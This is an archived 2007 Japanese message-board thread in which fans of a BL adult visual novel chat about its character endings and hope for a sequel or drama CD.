何かBL作品がアニメになるからどうのっての
他スレでみたような

141 :いけない名無しさん:2007/10/06(土) 01:45:19 ID:???
アニメ化とかよりトーラスの発売日が決定しました〜と
いう知らせの方がイイナー。
アニメはどうでもいいからゲームを早く出して欲すい・・・

142 :いけない名無しさん:2007/10/06(土) 17:37:38 ID:???
トーラスは次来るといわれている関東大震災みたいな扱いだからな・・・
大きいお知らせ→アニメ
お知らせ→CDドラマ かな。

143 :いけない名無しさん:2007/10/06(土) 18:07:00 ID:???
せっかく脇にも声ついたんだから
ファナみたいにドラマCD出して欲しいなぁ

144 :いけない名無しさん:2007/10/06(土) 21:31:31 ID:???
>マスター×タクトED

マスター…?

145 :いけない名無しさん:2007/10/06(土) 22:52:15 ID:???
全部のED見た?

146 :いけない名無しさん:2007/10/06(土) 23:18:09 ID:???
タクトがいきつけにしてる喫茶店のマスターだよ

147 :いけない名無しさん:2007/10/06(土) 23:20:21 ID:???
>>146
俺が書こうと思ったネタをー!

148 :いけない名無しさん:2007/10/06(土) 23:27:14 ID:???
少数派だと思うがマスター×タケトが一番好きだ……。
そこに行き着くまでに鬱エンド二つ見ちゃってたから、物凄い甘々に思えてさぁ……。

149 :いけない名無しさん:2007/10/06(土) 23:38:39 ID:???
>>148
おいおい名前間違ってるぞーw
×タケト
○タクト

自分も新刊通販中。
早く届くといいなー。

150 :いけない名無しさん:2007/10/07(日) 11:30:59 ID:???
タケトwwwww

なんかお笑い芸人みたいだ

151 :いけない名無しさん:2007/10/07(日) 17:45:28 ID:???
>>145
見たけど全然わかんねw
クリアしたの随分前だからかなぁ

152 :いけない名無しさん:2007/10/07(日) 20:48:57 ID:???
遼太BADのボンデージ拓人は覚えてる?

153 :いけない名無しさん:2007/10/08(月) 01:41:05 ID:???
あぁ、赤ちゃんプレイか。懐かしいな。

154 :いけない名無しさん:2007/10/08(月) 11:15:36 ID:???
>>152
ああ思い出したわ(;´Д`)
遼太と煌以外に第三者がいたのかと思ったわw
なかなか萌えるEDだったな…

155 :いけない名無しさん:2007/10/08(月) 11:46:58 ID:???
思えばマスターEDの煌はノリノリだったな

33 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)